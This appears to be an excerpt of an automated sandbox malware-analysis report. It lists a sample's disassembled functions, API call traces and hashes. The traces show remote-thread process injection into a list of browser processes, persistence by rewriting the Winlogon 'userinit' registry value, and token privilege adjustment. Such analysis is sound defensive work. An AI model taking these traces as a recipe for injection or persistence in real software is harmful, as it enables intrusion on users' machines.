                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 004017D8
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL ref: 004018A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheChangeCurrentErrorFindFlushFreeInstructionLastNotificationOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 2373081918-3024904723
                                                                                                                                                                                                              • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                              Function 02CB4CC0 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 211injectionlibrarymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 797 2cb4cc0-2cb4cd0 798 2cb4f0e-2cb4f12 797->798 799 2cb4cd6-2cb4cd9 797->799 799->798 800 2cb4cdf-2cb4ce2 799->800 800->798 801 2cb4ce8-2cb4cf0 800->801 802 2cb4cf2-2cb4cfb call 2cb5680 801->802 805 2cb4cfd-2cb4d05 Sleep 802->805 806 2cb4d07-2cb4d10 call 2cb5680 802->806 805->802 805->806 809 2cb4f09-2cb4f0d 806->809 810 2cb4d16-2cb4d2b OpenProcess 806->810 809->798 810->809 811 2cb4d31-2cb4d4b GetModuleHandleA 810->811 812 2cb4d68-2cb4d6c 811->812 813 2cb4d4d-2cb4d59 GetProcAddress 811->813 815 2cb4d6e-2cb4d82 GetModuleHandleA 812->815 816 2cb4da1-2cb4dd1 VirtualAllocEx 812->816 813->812 814 2cb4d5b-2cb4d65 GetCurrentProcess 813->814 814->812 817 2cb4d97-2cb4d9b 815->817 818 2cb4d84-2cb4d8e GetProcAddress 815->818 819 2cb4dd7-2cb4e00 WriteProcessMemory 816->819 820 2cb4ee6-2cb4efa GetHandleInformation 816->820 817->816 817->820 818->817 821 2cb4d90-2cb4d94 818->821 823 2cb4e02 819->823 824 2cb4e70-2cb4e96 FlushInstructionCache CreateRemoteThread 819->824 820->809 822 2cb4efc-2cb4f00 820->822 821->817 822->809 827 2cb4f02-2cb4f03 CloseHandle 822->827 828 2cb4e05-2cb4e1b VirtualAlloc 823->828 825 2cb4e98-2cb4eac GetHandleInformation 824->825 826 2cb4ec4-2cb4ee3 RtlCreateUserThread 824->826 829 2cb4ebb-2cb4ec2 825->829 830 2cb4eae-2cb4eb2 825->830 826->820 827->809 831 2cb4e58-2cb4e68 828->831 832 2cb4e1d-2cb4e52 memcpy WriteProcessMemory VirtualFree 828->832 829->820 830->829 834 2cb4eb4-2cb4eb5 CloseHandle 830->834 831->828 833 2cb4e6a-2cb4e6d 831->833 832->831 833->824 834->829
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CB5680: memset.MSVCRT ref: 02CB56A6
                                                                                                                                                                                                                • Part of subcall function 02CB5680: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02CB56B7
                                                                                                                                                                                                                • Part of subcall function 02CB5680: GetLastError.KERNEL32 ref: 02CB56C0
                                                                                                                                                                                                                • Part of subcall function 02CB5680: SwitchToThread.KERNEL32 ref: 02CB56CF
                                                                                                                                                                                                                • Part of subcall function 02CB5680: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02CB56D8
                                                                                                                                                                                                                • Part of subcall function 02CB5680: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CB56F8
                                                                                                                                                                                                                • Part of subcall function 02CB5680: CloseHandle.KERNEL32(00000000), ref: 02CB5709
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02CB4CFF
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02CB4D1E
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02CB4D3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02CB4D53
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 02CB4D5F
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02CB4D7A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02CB4D8A
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02CB4DC4
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02CB4DE5
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02CB4E11
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CB4E29
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02CB4E44
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02CB4E52
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02CB4E7A
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CB4E8C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB4EA4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB4EB5
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL ref: 02CB4ED6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB4EF2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB4F03
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 2650560580-3024904723
                                                                                                                                                                                                              • Opcode ID: fcb1034bce2f79ddc82a04a8481c937f855251c4c755f856f8b32d90c8e3dcc5
                                                                                                                                                                                                              • Instruction ID: 3342db10144709d9bb5bb830aca68135c9826691a21b4a815ff7709318901b5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcb1034bce2f79ddc82a04a8481c937f855251c4c755f856f8b32d90c8e3dcc5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A361DF75A41205BFEB25CF64CC98FAAB7B8AF84B45F548509F905DB281D7B0DA00CB60
                                                                                                                                                                                                              Function 02CA4F80 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 87networkstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsNetworkAlive.SENSAPI(02C96E0D,00000000), ref: 02CA4F93
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA4FA1
                                                                                                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 02CA4FAB
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4FC8
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02CA4FE7
                                                                                                                                                                                                              • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02CA5000
                                                                                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CA5013
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA502C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02CA5045
                                                                                                                                                                                                              • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02CA5058
                                                                                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CA5065
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
                                                                                                                                                                                                              • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                              • API String ID: 1656757314-3977723178
                                                                                                                                                                                                              • Opcode ID: 94f9344a49f4a08dc55f006f980dd443af380683781b55ed51cae6c7532d4c01
                                                                                                                                                                                                              • Instruction ID: 704d724765befb81a3bfb38c4143875728d157600ead8b454dbf3169d3172a1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94f9344a49f4a08dc55f006f980dd443af380683781b55ed51cae6c7532d4c01
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C721FBB6E843186BEB20D7A4AC41FCAB76C9B54755F400595F78CE60C0DAF0A6C48BD0
                                                                                                                                                                                                              Function 02CA78A0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 89memoryprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA78B4
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 02CA78D9
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000), ref: 02CA78FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02CA7917
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02CDFB80,?,00000000), ref: 02CA793B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02CA7941
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02CA7948
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB80,?,00000000), ref: 02CA7977
                                                                                                                                                                                                                • Part of subcall function 02CB4880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,74DF0F00,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB4895
                                                                                                                                                                                                                • Part of subcall function 02CB4880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48AC
                                                                                                                                                                                                                • Part of subcall function 02CB4880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48CA
                                                                                                                                                                                                                • Part of subcall function 02CB4880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48E2
                                                                                                                                                                                                                • Part of subcall function 02CB4880: GetHandleInformation.KERNEL32(?,00000000), ref: 02CB493B
                                                                                                                                                                                                                • Part of subcall function 02CB4880: FindCloseChangeNotification.KERNEL32(?), ref: 02CB494C
                                                                                                                                                                                                                • Part of subcall function 02CB4880: GetHandleInformation.KERNEL32(00000000,?), ref: 02CB495E
                                                                                                                                                                                                                • Part of subcall function 02CB4880: CloseHandle.KERNEL32(00000000), ref: 02CB496F
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02CA798B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02CA79A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02CA79B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 02CA7912
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocChangeCharCreateCurrentEnterFindFirstLeaveNextNotificationSnapshotToolhelp32Upper
                                                                                                                                                                                                              • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
                                                                                                                                                                                                              • API String ID: 3743708096-4199822264
                                                                                                                                                                                                              • Opcode ID: b05e4b9eface63532fbaf797303c731213e5184129575da141f616baa615eb5a
                                                                                                                                                                                                              • Instruction ID: 368b5efa67154c31ff4810704b31b833c040ecbc527b7f64485e78acc7341a63
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b05e4b9eface63532fbaf797303c731213e5184129575da141f616baa615eb5a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7731C031D02215AFE720DF65C818BAEFBB8FF88399F504199E849D3200D7709A44CBA0
                                                                                                                                                                                                              Function 02C979E0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 91threadstringnativeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 02C979FC
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 02C97A0F
                                                                                                                                                                                                                • Part of subcall function 02CB4880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,74DF0F00,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB4895
                                                                                                                                                                                                                • Part of subcall function 02CB4880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48AC
                                                                                                                                                                                                                • Part of subcall function 02CB4880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48CA
                                                                                                                                                                                                                • Part of subcall function 02CB4880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48E2
                                                                                                                                                                                                                • Part of subcall function 02CB4880: GetHandleInformation.KERNEL32(?,00000000), ref: 02CB493B
                                                                                                                                                                                                                • Part of subcall function 02CB4880: FindCloseChangeNotification.KERNEL32(?), ref: 02CB494C
                                                                                                                                                                                                                • Part of subcall function 02CB4880: GetHandleInformation.KERNEL32(00000000,?), ref: 02CB495E
                                                                                                                                                                                                                • Part of subcall function 02CB4880: CloseHandle.KERNEL32(00000000), ref: 02CB496F
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C97A1E
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C97A37
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 02C97A3E
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,5dd2ba1da), ref: 02C97A54
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C97A99
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C97AB3
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 02C97AC6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Information$HandleOpenProcess$CloseCurrentThreadToken$ChangeCharDesktopFindMutexNotificationObjectQuerySystemUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                              • String ID: 5dd2ba1da$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                              • API String ID: 2411378745-749939932
                                                                                                                                                                                                              • Opcode ID: 213613a6f36a607df6dcf2e6fabad92ad848e101000dff00ec3d0469898cc2e0
                                                                                                                                                                                                              • Instruction ID: 7dd4ad826f9bc7e2a13f7da71e61877c0fe317531bc1a54a160feb90334521ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 213613a6f36a607df6dcf2e6fabad92ad848e101000dff00ec3d0469898cc2e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C931B4B2A812159BDF20CE54DC48BAAF76CFF84B11F540555FE45D7280EBB0AA58CBA0
                                                                                                                                                                                                              Function 02CB5930 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02CB5940
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5947
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,02CA4D1B,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5957
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB595E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02CB5981
                                                                                                                                                                                                              • AdjustTokenPrivileges.KERNELBASE(02CA4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02CB599B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB59A5
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(02CA4D1B), ref: 02CB59B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustChangeCloseErrorFindLastLookupNotificationPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 348569255-2333288578
                                                                                                                                                                                                              • Opcode ID: bcd97abc7538b716a53a0482e1d644ca698b9540d08f61c79a39314b0722976e
                                                                                                                                                                                                              • Instruction ID: bcc4d8471a41e4ded5f7baef5bc8bacbaef96e9fcedfce659baee0593b97f359
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcd97abc7538b716a53a0482e1d644ca698b9540d08f61c79a39314b0722976e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50113C71E82214ABEB10DBE09C4DFAA7B7CEF44B85F904958BA01E6180D7B0A615C7A1
                                                                                                                                                                                                              Function 029B1360 Relevance: 3.2, APIs: 2, Instructions: 241memorylibraryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 029B1451
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 029B1515
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_29b0000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3550616410-0
                                                                                                                                                                                                              • Opcode ID: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                              • Instruction ID: 3dd3af84dec03fd8af733d52ad0184fd6fe6d59c1dc2d7fc687a89fec7ffeb46
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7915C71D00219AFCB25DFA8CD64BEEB7BAAF88394F154559E808B7304D734A901CF94
                                                                                                                                                                                                              Function 02CA7DD0 Relevance: 51.0, APIs: 24, Strings: 5, Instructions: 244registrymemorysynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 450 2ca7dd0-2ca7de2 451 2ca7de5-2ca7dea 450->451 451->451 452 2ca7dec-2ca7df3 451->452 453 2ca7df9-2ca7e06 PathFileExistsA 452->453 454 2ca7fd7-2ca7fdf IsUserAnAdmin 452->454 453->454 457 2ca7e0c-2ca7e2b RegOpenKeyExA 453->457 455 2ca7ff8-2ca8008 454->455 456 2ca7fe1-2ca7ff6 454->456 458 2ca800d-2ca8015 RegOpenKeyExA 455->458 456->458 459 2ca7f78-2ca7f91 RegOpenKeyExA 457->459 460 2ca7e31-2ca7e55 RegQueryValueExA 457->460 462 2ca806b-2ca8071 458->462 463 2ca8017-2ca8026 CreateEventA 458->463 459->454 461 2ca7f93-2ca7f9b 459->461 464 2ca7e5b-2ca7e75 GetProcessHeap HeapAlloc 460->464 465 2ca7f68-2ca7f76 RegFlushKey 460->465 467 2ca7fa0-2ca7fa5 461->467 463->462 468 2ca8028-2ca803b RegNotifyChangeKeyValue 463->468 464->465 469 2ca7e7b-2ca7ea9 memset RegQueryValueExA StrStrIA 464->469 466 2ca7fd1 RegCloseKey 465->466 466->454 467->467 470 2ca7fa7-2ca7fd0 RegSetValueExA RegFlushKey 467->470 471 2ca8041-2ca8048 WaitForSingleObject 468->471 472 2ca7eaf-2ca7eb1 469->472 473 2ca7f46-2ca7f5a GetProcessHeap HeapValidate 469->473 470->466 471->471 474 2ca804a-2ca8050 471->474 475 2ca7eb4-2ca7eb9 472->475 473->465 476 2ca7f5c-2ca7f62 GetProcessHeap HeapFree 473->476 477 2ca805c-2ca8069 RegNotifyChangeKeyValue 474->477 478 2ca8052-2ca8057 call 2cb4a10 474->478 475->475 479 2ca7ebb-2ca7ebd 475->479 476->465 477->471 478->477 480 2ca7ebf-2ca7ec4 479->480 481 2ca7ee1-2ca7ee6 479->481 480->481 483 2ca7ec6-2ca7ec9 480->483 484 2ca7ee8-2ca7eed 481->484 485 2ca7ed0-2ca7ed6 483->485 484->484 486 2ca7eef-2ca7ef1 484->486 485->485 487 2ca7ed8-2ca7ede 485->487 488 2ca7ef4-2ca7efa 486->488 487->481 488->488 489 2ca7efc-2ca7f0d 488->489 490 2ca7f10-2ca7f16 489->490 490->490 491 2ca7f18-2ca7f24 490->491 492 2ca7f27-2ca7f2c 491->492 492->492 493 2ca7f2e-2ca7f40 RegSetValueExA 492->493 493->473
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02CA7DFE
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02CA7E27
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02CA7E47
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02CA7E64
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA7E6B
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA7E7F
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02CA7E99
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02CA7EA1
                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02CA7F40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA7F4F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA7F52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA7F5F
